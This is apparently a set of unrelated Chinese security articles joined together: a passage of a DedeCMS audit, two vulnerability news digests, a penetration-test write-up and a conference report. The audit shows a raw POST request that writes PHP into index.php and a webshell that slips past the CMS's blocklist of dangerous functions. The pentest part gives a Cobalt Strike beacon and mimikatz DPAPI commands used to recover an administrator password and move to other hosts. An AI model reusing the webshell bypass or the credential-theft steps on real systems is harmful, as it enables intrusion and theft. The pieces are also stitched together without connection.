if(preg_match("#^create table#i",$clean)) $fail = FALSE;            $error="unusual character";       }        //老版本的Mysql并不支持union，常用的程序里也不使用union，但是一些黑客使用它，所以检查它        if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)       {            $fail = TRUE;            $error="union detect";       }        //发布版本的程序可能比较少包括--,#这样的注释，但是黑客经常使用它们        elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)       {            $fail = TRUE;            $error="comment detect";       }        //这些函数不会被使用，但是黑客会用它来操作文件，down掉数据库        elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)       {            $fail = TRUE;            $error="slown down detect";       }        elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)       {            $fail = TRUE;            $error="slown down detect";       }        elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0)       {            $fail = TRUE;            $error="file fun detect";       }        elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0)       {            $fail = TRUE;            $error="file fun detect";       }        //老版本的MYSQL不支持子查询，我们的程序里可能也用得少，但是黑客可以使用它来查询数据库敏感信息        elseif (preg_match('~\([^)]*?select~s', $clean) != 0)       {            $fail = TRUE;            $error="sub select detect";       }        if (!empty($fail))       {            fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");            exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");       }        else       {            return $db_string;       }   } } 案例 4 基于这个文件管理，我们还是在这个类，肯定还有编辑文件的说法 我们来到对应的路由去查看 果然找到了 //文件编辑 /*--------------- function __saveEdit(); ----------------*/ else if($fmdo=="edit") {    csrf_check();    $filename = str_replace("..", "", $filename);    $file = "$cfg_basedir$activepath/$filename";    $str = stripslashes($str);    $fp = fopen($file, "w");    fputs($fp, $str);    fclose($fp);    if ($fp === false) {        ShowMsg("保存失败！请检查文件是否可写", -1);        exit();   }    if(empty($backurl))   {        ShowMsg("成功保存一个文件！","file_manage_main.php?activepath=$activepath");   }    else   {        ShowMsg("成功保存文件！",$backurl);   }    exit(); } 一样的方法 文件名是 filename，内容是 str 我们访问对应的路由 发现是一个文件管理器，而且可以编辑文件，那不是随便 getshell 了吗 POST /dede/file_manage_control.php HTTP/1.1 Host: dedecms:5135 Content-Length: 130 Cache-Control: max-age=0 Origin: http://dedecms:5135 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://dedecms:5135/dede/file_manage_view.php?fmdo=edit&filename=index.php&activepath= Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: menuitems=1_1%2C2_1%2C3_1; XDEBUG_SESSION=PHPSTORM; isg=BC0t-H7JNkY1K9KqstDirHGTPMmnimFclPBmVm8zhEQz5k2YN9gMLle10DoA_XkU; tfstk=gsmxOxa7tQAceJrHmnTljVp-sV9kxcH2mjkCj5b_cbettXgmmxVDPgwgQZNblAM1BArb7qVgi5EtQXpktHxn3xra5BAHx21QgMEa1hq6ruMWmMYktHxnhxrafBAnm2uO4We_ftsb5LE7K7wfcfNbP_wLLlNs1fZ7FRwa Connection: keep-alive fmdo=edit&backurl=&token=&activepath=&filename=index.php&str=%3C%3Fphp%0D%0Asystem%28%27whoami%27%29%3B&B1=++%E4%BF%9D+%E5%AD%98++ 但是发现 所以准备调试分析一手 $str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str); global $cfg_disable_funs; $cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace'; $cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert,getallheaders'; foreach (explode(",", $cfg_disable_funs) as $value) {    $value = str_replace(" ", "", $value);    if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", " {$str}") == TRUE) {        $str = dede_htmlspecialchars($str);        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");   } } if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$str}") == TRUE) {    if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$str}") == TRUE) {        $str = dede_htmlspecialchars($str);        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");   }    if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$str}") == TRUE) {        $str = dede_htmlspecialchars($str);        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");   }    if(preg_match("#[`][\s\S]*[`]#i", " {$str}") == TRUE) {        $str = dede_htmlspecialchars($str);        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");   } } 发现原因是因为有 waf 直接交给一个聪明朋友 移除多行注释 $str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str); 防止攻击者把危险代码写在注释中来绕过检测。 危险函数与变量过滤 $cfg_disable_funs = 'eval,assert,exec,...,$_GET,$_POST,...'; 匹配并拦截使用了以下内容的代码： 系统函数：eval, exec, system, passthru, popen, assert, shell_exec 等 全局变量：`$GET, $POST, $REQUEST, $COOKIE, $_FILES, GLOBALS 动态函数调用：call_user_func, create_function, 等 一旦匹配：直接终止执行并提示危险代码。 PHP 标签与代码执行行为检测 感觉过滤还是挺严格的 绕过 waf 到 RCE 直接掏出上次的 webshell，稍微修改一下就 ok 了 <?php class User {    private $username;    private $password;    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        $xmlData = base64_decode("PGJvb2tzPgogICAgPHN5c3RlbT5jYWxjPC9zeXN0ZW0+CjwvYm9va3M+");        $xmlElement = new SimpleXMLElement($xmlData);        $namespaces = $xmlElement->getNamespaces(TRUE);        $xmlElement->rewind();        var_dump($xmlElement->key());        $result = $xmlElement->xpath('/books/system');        var_dump (($result[0]->__toString()));       ($xmlElement->key())($result[0]->__toString());        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); 原理上次大概讲过了，就是自动触发 详情可以看到蚁景网络安全这个公众号 https://mp.weixin.qq.com/s/WDWBwPQuXroBRpBPxkHOcg感谢给的平台 然后我们访问首页 成功弹出计算器

1、Charon勒索软件攻击中东公共与航空部门 https://thehackernews.com/2025/08/charon-ransomware-hits-middle-east.html 网络安全公司Trend Micro披露，一种名为“Charon”的新型勒索软件针对中东公共部门与航空业发起攻击，展现APT级别的隐蔽与规避技术。攻击链利用DLL侧加载、进程注入及EDR绕过手段，与疑似关联组织Earth Baxia的战术相似。恶意程序通过伪装Edge.exe加载恶意DLL，再部署勒索载荷，终止安全进程、删除备份并使用多线程与部分加密加速加锁过程。攻击还引入未触发的BYOVD功能以禁用EDR，并使用定制化赎金信直指受害组织，显示针对 2、PS1Bot恶意广告投放多阶段内存攻击 https://blog.talosintelligence.com/ps1bot-malvertising-campaign/ Cisco Talos研究人员揭示，一场利用恶意广告（Malvertising）传播的新型PS1Bot恶意软件活动正在活跃，该框架采用模块化设计，通过PowerShell与C#实现多阶段、纯内存执行，以窃取信息、记录键盘输入、截屏、抓取加密货币钱包数据并建立持久访问。攻击自2025年初活跃，入口通常为压缩包内的JavaScript下载器，经外部服务器获取脚本并执行，逐步加载各功能模块，极少在磁盘留下痕迹。PS1Bot与AHK Bot及Skitnet等过去与勒索软件 3、Fortinet警告FortiSIEM高危漏洞已被利用 https://fortiguard.fortinet.com/psirt/FG-IR-25-152 Fortinet发布安全通告称，其FortiSIEM产品存在高危漏洞CVE-2025-25256（CVSS 9.8），且已有在野利用代码。该漏洞为操作系统命令注入，可允许未经认证的攻击者通过构造的CLI请求执行任意代码或命令，影响FortiSIEM多个6.x与7.x版本。Fortinet建议用户尽快升级至修复版本，并在此期间限制对phMonitor端口（7900）的访问。公司未披露具体利用细节与受害范围，但指出利用代码缺乏明显入侵指标，增加了检测难度。 4、Zoom与Xerox修复高危提权与RCE漏洞 https://www.zoom.com/en/trust/security-bulletin/zsb-25030 Zoom与Xerox相继发布安全更新，修复多项高危漏洞。Zoom Windows客户端存在未受信任搜索路径漏洞（CVE-2025-49457，CVSS 9.6），可被未经认证的远程攻击者利用实现权限提升，影响多款Zoom Workplace、Zoom Rooms及SDK版本，需升级至6.3.10及以上。Xerox FreeFlow Core则修复了XML外部实体注入（CVE-2025-8355）与路径遍历（CVE-2025-8356，CVSS 9.8）漏洞，后者可被用来实现远程 5、新型Windows零点击NTLM漏洞可绕过微软最新补丁 https://www.freebuf.com/articles/vuls/444360.html 研究人员发现一个严重零点击NTLM（新技术局域网管理器）凭证泄露漏洞（CVE-2025-50154），该漏洞可绕过微软此前针对CVE-2025-24054发布的补丁。攻击者无需用户交互即可从已完全打补丁的Windows系统中提取NTLM哈希值，这表明微软四月份发布的安全更新并不完善。 6、Windows OOBE漏洞可绕过防护并获取管理员权限 https://www.freebuf.com/articles/system/444291.html 研究人员发现了一种新的利用 Windows 初始设置体验（Out-of-Box-Experience，OOBE）的方法，该方法可绕过现有保护措施，获取 Windows 计算机的管理员权限命令行访问。 7、Win 11 23H2 家庭版与专业版将于11月11日终止更新支持 https://www.anquanke.com/post/id/311156 微软在公告中表示：“Windows 11 家庭版和专业版 23H2 将于 2025 年 11 月 11 日结束更新支持。该版本于 2023 年 10 月发布。此日期之后，如客户联系微软支持，将被建议升级至最新版本的 Windows 11，以继续获得支持。” 8、Teams RCE漏洞允许攻击者读取、修改及删除消息 https://www.anquanke.com/post/id/311136 微软在 2025 年 8 月的补丁星期二（Patch Tuesday）更新中披露了 Microsoft Teams 协作软件中存在的一项严重远程代码执行（RCE）漏洞。这一关键漏洞编号为 CVE-2025-53783，攻击者可通过网络执行代码，进而读取、修改甚至删除用户消息和数据。 9、美秘密在AI芯片货运中放置定位追踪器，以防流向中国 https://www.secrss.com/articles/82000 据媒体报道，美国政府已秘密在他们认为极有可能被转移到中国的AI芯片货运中放置定位追踪器，这一此前未公开的手段引发广泛关注。两名直接知情人士透露，此举旨在监控受美国出口限制的AI芯片是否被转移至中国，仅针对特定调查中的货物实施。 10、VMware ESXi严重漏洞威胁全球大量服务器 https://www.secrss.com/articles/81979 网络安全研究人员警告称，VMware ESXi曝出严重整数溢出漏洞CVE-2025-41236（CVSS评分9.3），全球超过1.7万个实例面临暴露威胁。国内超1700台受影响。 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、荷兰多机构遭Citrix网关零日漏洞入侵 https://nvd.nist.gov/vuln/detail/CVE-2025-6543 荷兰国家网络安全中心（NCSC）警告，关键漏洞CVE-2025-6543在Citrix NetScaler设备中被黑客利用，入侵国内多家关键机构。该漏洞为内存溢出缺陷，最初被认为仅用于拒绝服务攻击，但调查显示攻击者实际实现了远程代码执行，并在入侵后清除痕迹以掩盖行踪。攻击自2025年5月初即作为零日漏洞持续利用，早于官方6月发布补丁近两个月。受害机构包括荷兰公共检察署（OM），其业务一度严重受阻。NCSC建议尽快升级至安全版本并终止所有活动会话，同时使用其发布的检测脚本排查异常文件和入侵迹象。 2、Manpower数据泄露波及近14.5万人 https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/7f78311b-64ff-4436-82b7-187ed0d23685.html 全球大型人力资源公司Manpower披露，其美国密歇根州兰辛市加盟商在2024年12月底至2025年1月中遭遇网络入侵，约14.4万名个人信息被窃取。泄露数据或包括护照扫描件、社保号、联系方式、财务信息、合同及人事资料等。事件最初在1月因系统中断被发现，RansomHub勒索团伙曾声称窃取约500GB数据并在暗网发布，后删除相关信息，疑似已获赎金。公司称 3、西门子SIMATIC RTLS定位管理器曝出高危漏洞 https://www.freebuf.com/articles/ics-articles/444238.html 西门子产品安全应急响应团队（ProductCERT）发布高危安全公告（SSA-493787），警告其SIMATIC RTLS Locating Manager（实时无线定位系统管理软件）3.2之前版本存在严重漏洞（CVE-2025-40746）。该漏洞CVSS v3.1基础评分高达9.1分，表明被利用后可能造成严重影响。 4、朝鲜攻击组织Kimsuky内部数据泄露，攻击基础设施全曝光 https://cybersecuritynews.com/kimsuky-hackers-data-breach/ 朝鲜黑客组织Kimsuky内部工具遭泄露，曝光34,000页数据，包括钓鱼攻击基础设施、内核后门、定制Cobalt Strike信标及窃取的韩国政府证书与内网权限，揭示其长期渗透手段，为防御者提供关键情报。 5、研究人员在数十个Docker Hub镜像中发现XZ Utils后门 https://thehackernews.com/2025/08/researchers-spot-xz-utils-backdoor-in.html XZ Utils后门仍在Docker Hub扩散，35个镜像携带恶意代码，攻击者可远程执行root命令。攻击者长期潜伏开源项目获取权限，事件凸显供应链风险，需加强二进制监控。 6、Fortinet SSL VPN遭遇全球暴力破解浪潮 https://thehackernews.com/2025/08/fortinet-ssl-vpns-hit-by-global-brute.html 全球Fortinet SSL VPN设备遭协同暴力破解攻击，780+恶意IP瞄准多国，攻击者精准定向FortiOS配置文件后转向FortiManager系统，或为高级威胁行为者预谋行动。 7、Chrome修复多个高危漏洞，借此执行任意代码 https://cybersecuritynews.com/chrome-security-update-aug/ Chrome紧急修复6个高危漏洞，其中3个可导致恶意代码执行，涉及V8引擎和图形组件，用户应立即通过设置更新浏览器以防范攻击风险。 8、FortiSIEM 关键漏洞致攻击者可远程执行恶意命令 https://cybersecuritynews.com/fortisiem-vulnerability-poc-found-in-wild/ FortiSIEM高危漏洞(CVE-2025-25256)可被未授权攻击者利用执行任意命令，已在野外被积极利用。影响6.1-7.3多个版本，CVSS评分9.8。建议立即升级或限制7900端口访问。 9、CISA将WinRAR零日漏洞列入已知被利用漏洞目录 https://www.freebuf.com/articles/endpoint/444219.html 美国网络安全和基础设施安全局（CISA）已将该漏洞列入其已知被利用漏洞目录，要求联邦机构在2025年9月2日前完成缓解措施部署。WinRAR已发布7.13版本修复这个正被网络犯罪分子积极利用的关键安全漏洞，这是这款流行文件压缩软件遭遇的又一重大安全事件。该漏洞编号为CVE-2025-8088，攻击者可通过特制压缩包执行任意代码，已引发全球用户的紧急响应。 10、微软Office漏洞可导致攻击者远程执行代码 https://www.freebuf.com/articles/444209.html 声明微软发布关键安全更新，修复了Microsoft Office中的三个严重漏洞，这些漏洞可能允许攻击者在受影响系统上执行远程代码。这些漏洞编号为CVE-2025-53731、CVE-2025-53740和CVE-2025-53730，影响多个版本的Microsoft Office，对全球企业和个人用户构成重大安全风险。 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、联想Linux摄像头漏洞可变身BadUSB攻击工具 https://eclypsium.com/blog/badcam-now-weaponizing-linux-webcams/ 安全公司Eclypsium披露，部分联想Linux系统摄像头（型号510 FHD与Performance FHD）存在固件验证缺陷（CVE-2025-4371），可被远程劫持并改造成BadUSB设备，隐蔽注入按键、传送恶意载荷甚至持久化控制。攻击者可在获得系统远程执行权限后重刷摄像头固件，使其在外观和功能正常的情况下执行恶意操作，并能在系统重装后继续感染。该漏洞首次展示了USB外设在未断开连接的情况下被远程武器化的可能性。联想已于2025年4月与SigmaStar 2、TETRA加密漏洞威胁执法通信安全 https://thehackernews.com/2025/08/new-tetra-radio-encryption-flaws-expose.html 网络安全公司Midnight Blue在Black Hat USA大会上披露TETRA无线电协议存在多项新漏洞（统称“2TETRA:2BURST”），包括重放攻击、弱化AES-128加密、缺乏消息认证及密钥恢复风险等（CVE-2025-52940至52944）。漏洞影响执法、军队、交通及关键基础设施通信，可导致攻击者注入或重放语音和数据，甚至暴力破解密钥解密流量。部分问题源于ETSI此前对旧漏洞（CVE-2022-24401）的修复不充 3、Windows EPM中毒漏洞可致域权限提升 https://thehackernews.com/2025/08/researchers-detail-windows-epm.html 安全公司SafeBreach在DEF CON 33上披露，微软Windows RPC协议中的已修复漏洞（CVE-2025-49760）可被利用实施EPM中毒攻击，诱使受保护进程与攻击者控制的服务器进行认证，从而实现本地或域权限提升。攻击者可注册核心服务的接口UUID，冒充合法RPC服务器，并在系统启动延迟或手动启动服务时抢先注册接口。该漏洞于2025年7月补丁日修复，暴露了RPC端点映射器缺乏安全校验的风险。 4、Erlang/OTP SSH漏洞被大规模利用攻击OT防火墙 https://thehackernews.com/2025/08/researchers-spot-surge-in-erlangotp-ssh.html Palo Alto Networks Unit 42警告，关键漏洞CVE-2025-32433（CVSS 10.0）在修复后仍遭大规模利用，约70%攻击目标为OT网络防火墙。该漏洞源于Erlang/OTP SSH实现缺少身份验证，攻击者可在无凭证情况下远程执行任意代码。监测显示，自2025年5月起，攻击活动集中于医疗、农业、传媒及高科技行业，主要分布在美国、加拿大、巴西、印度和澳大利亚。成功入侵后，威胁者多通过反向Shell获取持续访问 5、智能公交系统漏洞使攻击者可远程追踪并控制车辆 https://www.freebuf.com/articles/ics-articles/443931.html 主流智能公交系统中新发现的安全漏洞可能危及乘客安全与车队完整性。研究人员在多家大型公交运营商车载调制解调器的远程管理接口中发现关键漏洞CVE-2025-44179。攻击者利用该漏洞不仅能实时追踪公交车位置，还能向车门控制、引擎启停和空调系统等关键子系统发送远程控制指令。 6、Apache bRPC 漏洞可导致远程拒绝服务攻击 https://www.freebuf.com/articles/network/443901.html Apache bRPC 项目发布重要安全公告，披露其 Redis 协议解析器中存在一个可导致攻击者远程崩溃受影响服务的关键漏洞。该漏洞编号为 CVE-2025-54472，影响 1.14.1 之前的所有版本，包括已部分修复的 1.14.0 版本。 7、知名车企门户漏洞或致攻击者远程解锁汽车并窃取数据 https://hackread.com/carmaker-portal-flaw-hackers-unlock-cars-steal-data/ 大型汽车制造商在线系统漏洞可致客户数据泄露及车辆远程控制，研究员发现后车企一周内修复。漏洞源于身份验证缺陷，攻击者通过VIN即可获取车主信息并解锁车门，危害严重。建议更新车载软件并谨慎使用远程功能。 8、 Reddit封禁互联网档案馆以阻止AI公司免费抓取数据 https://securityonline.info/reddit-blocks-internet-archive-to-stop-ai-companies-from-scraping-data-for-free/ Reddit禁止AI公司通过互联网档案馆免费抓取数据，要求商业许可并付费使用。已封锁档案馆抓取详情页，仅允许索引公开元素。此前起诉Anthropic违规抓取，显示其严格保护数据版权的决心。 9、全球近3万台Exchange服务器未修复关键混合云漏洞 https://siliconangle.com/2025/08/11/nearly-30000-microsoft-exchange-servers-remain-unpatched-critical-hybrid-flaw/ 微软Exchange Server关键漏洞(CVE-2025-53786)影响近3万台系统，攻击者可利用本地权限入侵云环境。美、德、俄等国服务器风险最高。CISA要求立即修补并断开暴露服务器，专家警告未修复将导致域沦陷。 10、DarkBit攻击ESXi服务器部署勒索软件加密VMDK文件 https://cybersecuritynews.com/darkbit-hackers-attacking-vmware-esxi-servers/ DarkBit勒索软件精准攻击VMware ESXi服务器，加密虚拟机文件，但研究人员发现其AES-128-CBC加密存在漏洞，利用VMDK文件头可预测特性实现无需赎金的数据恢复，暴露加密方案缺陷。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 本文章所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。 外网打点 首先一波信息收集过后，把最后收集的到的 url 拿到 httpx 去做一下存活检测 httpx 测活一下 测完活之后，搞波指纹 指纹到手，这边一般我都是拿高危指纹去漏扫一下 然后找到了一个站点 GETshell 之后找到了一个站点 直接访问如下，相信这种情况很常见，别急，其实还有利用空间，然后我对它目录扫描了一波 发现竟然有 /api/actuator 泄露，这个利用的手法很多 先遍历访问一下常见的接口 但是这个点接口权限不够，比如常见的 env 和 heapdump 访问不到 决定溜了的时候发现 bp 我的 dns 平台传来了动静 竟然有 log4j 呜呜呜，网上一堆工具，打 log4j 都到完全自动化的地步了 CS 生成一个命令，上线到 cs 上，因为不好传文件，就执行命令 07/23 15:13:23 beacon> shell whoami 07/23 15:13:23 [*] Tasked beacon to run: whoami 07/23 15:13:23 [+] host called home, sent: 37 bytes 07/23 15:13:23 [+] received output: xxxxxx\administrator 内网启动 内网信息收集 首先简单看下内网的网段 找到了内网之后我们就需要查看存活情况了，我的 fscan 没有免杀，这里只能随便看看了 随便 arp-a 看了一下 发现 c 段的主机还是很多的 systeminfo win2012 的用户，不过已经是高权限了，也没有必要提权了 然后我发现在域的时候我就先不管了，先找找凭据 凭据收集 这里没有抓取到密码 然后自己尝试了半天，大师傅提示了一些东西，我觉得这个思路也不错，下面讲讲是如何突破的 突破 当时因为还拿下了一台主机，而且是同一个内网的 查询连接信息的时候查到了之前的那个内网，我就想着可以尝试使用 DPAPI DPAPI 是 Windows 系统用来加密敏感数据（比如用户保存的密码、浏览器凭据、无线密码等）的一个加密机制 MasterKey 就是一串“主密钥”，是每个用户登录 Windows 后系统自动为其生成的，用来加密和解密数据的“钥匙” 流程 [ 用户口令 → 派生 Key1 ]       ← 用来加密 MasterKey       ↓ [ MasterKey ]               ← 用来加密 DPAPI 中的密码等敏感数据       ↓ [ 某个应用的数据（如 WiFi 密码） ]GUID     : {3cef9fc0-4319-42da-80ff-9e74470a9f7c} Time     : 2025/2/4 0:23:08 MasterKey : aed5fc1156359826c231e1079996c769cf1ee... sha1(key) : deb68bc117a3323d424a7d21a86173438e2419f7 Master Key Files 存放密钥的文件则被称之为 MasterKeyFiles，其路径一般为 %APPDATA%/Microsoft/Protect/%SID%。而这个文件中的密钥实际上是随机 64 位字节码经过用户密码等信息的加密后的密文，所以只需要有用户的明文密码/Ntlm/Sha1 就可以还原了。 当然除了 GUID 命名的文件之外，还有 Preferred，显示当前系统正在使用的 MasterKey file 及其过期时间 我这里去寻找一下 amdin 的凭证 直接拿最新的那个 然后去获取 guid 之后通过这个 guid，我们去寻找 masterkey 首先需要把全部的 masterkey 找出来 mimikatz sekurlsa::dpapi sekurlsa::dpapi 会从 lsass 中提取当前用户登录会话的 DPAPI MasterKey 解密材料（如密码、hash、SID 等），用于离线解密各种 DPAPI 加密的凭据文件 因为内容很多，直接把结果复制到记事本 然后搜索一下 太好了，找到了，然后我们直接去破解 mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\xxxxx /masterkey:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 直接获取到了管理员的密码 而且这个密码应该是集团的通用密码，后续发现这个这个内网网段的管理员都是这个密码 远程其他网段的桌面 利用这个密码，横向了大概有 9 台主机

2025 年 8 月 9 日，在湖南长沙，一场网络安全领域的盛会 ——“2025 年网络安全技术创新与人才教育大会” 圆满落下帷幕。本次大会由中国网络空间新兴技术安全创新论坛（新安盟）、中国网络空间安全人才教育论坛（网教盟）、中国教育网络靶场论坛（教育靶场联盟）以及国务院学位办网络空间安全学科评议组联合主办，其主题为 “融合创新・共筑安全”。 大会现场汇聚了来自全国的 500 余位网络安全领域专家、学者、企业领袖以及政府代表。他们聚焦于网络空间安全领域当下所面临的新兴技术安全挑战，以及人才缺乏的现状，积极交流网络空间安全产业发展与技术创新，分享网络空间安全学科建设、人才培养经验和模式，致力于为行业高质量发展注入强劲动能。 本次大会设置5个平行分论坛，精准聚焦网络靶场及众测技术、人才实践能力培养、人工智能+安全、主动防御、人才认证等领域，40余位专家深入拆解技术难点与产业需求，并发布了10余项细分领域创新成果，这里俨然成为行业垂直领域的 “思想策源地”。 蚁景科技作为网络安全人才教育领域的标杆企业，荣幸受邀出席此次大会。在大会期间，蚁景科技深度参与到人才实践能力培养、人才认证等分论坛当中。在参与本次大会过程中，蚁景科技代表与高校教师、网安企业 HR 以及行业专家展开了热烈且富有成效的互动交流。在交流中蚁景科技分享了企业在网络安全人才培养中的一系列实践经验，包括创新的教学方法、实战项目的引入以及人才培养体系的构建等，赢得了行业同仁的高度认可与好评。 展望未来，蚁景科技将秉持初心，持续深化与政府、高校、企业的合作。蚁景科技将通过不断升级网安实验室，为网安人才提供更优质的实践环境；同时，深化网安实战技能教学体系，紧跟行业前沿技术，持续优化课程设置，让教学更贴合网安岗位需求且更具前瞻性。通过这些举措，蚁景科技致力于推动网络安全教育朝着标准化、实战化方向发展，助力网络安全行业实现更高质量的发展。